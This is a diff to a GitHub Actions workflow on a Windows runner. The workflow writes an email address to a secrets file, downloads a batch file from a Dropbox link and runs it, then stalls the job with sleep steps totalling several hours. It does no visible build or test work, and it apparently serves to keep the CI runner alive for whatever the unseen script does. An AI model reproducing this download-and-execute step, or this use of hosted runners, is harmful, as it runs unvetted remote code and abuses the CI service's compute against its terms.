--- a/.github/workflows/A7.yml
+++ b/.github/workflows/A7.yml
@@ -8,54 +8,49 @@ jobs:
     runs-on: windows-latest
 
     steps:
-      
-      - name: A
-        run: start-sleep 300
-
-      - name: B
-        run: start-sleep -s 300
-
-      - name: C
-        run: start-sleep 300
-
-      - name: D
-        run: start-sleep -s 300
-
-      - name: E
-        run: start-sleep 300
-
-      - name: F
-        run:  start-sleep -s 300
-
-      - name: Downloading & Setting Up
+    
+      - name: Downloading - Setting Up
         run: |
          echo "EMAIL_SECRET=ainxd@hldrive.com" > secrets.txt
          Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/3fv6r025lzn92gv6atbbu/down.bat?rlkey=ti46bzfu0kss1kvcoazxe7iab&dl=1" -OutFile "down.bat"
          cmd /c down.bat
       
+      - name: A
+        run: |
+         start-sleep 300
+         start-sleep -s 300
+      
+      - name: B
+        run: |
+         start-sleep 300
+         start-sleep -s 300
+
+      - name: C
+        run: |
+         start-sleep 300
+         start-sleep -s 300
+
+      - name: D
+        run: |
+         start-sleep 300
+         start-sleep -s 300
+
+      - name: E
+        run: |
+         start-sleep 300
+         start-sleep -s 300
+
+      - name: F
+        run: |
+         start-sleep 300
+         start-sleep -s 300
+      
       - name: G
-        run: start-sleep 300
-
+        run: |
+         start-sleep 300
+         start-sleep -s 300
+      
       - name: H
-        run: start-sleep -s 300
-
-      - name: I
-        run: start-sleep 300
-
-      - name: J
-        run: start-sleep -s 300
-      
-      - name: K
-        run: start-sleep 300
-
-      - name: L
-        run: start-sleep -s 300
-
-      - name: M
-        run: start-sleep 300
-
-      - name: N
-        run: start-sleep -s 300
-      
-      - name: O
-        run: Start-sleep -Seconds 21600
+        run: |
+         start-sleep 10800
+         start-sleep -s 10800
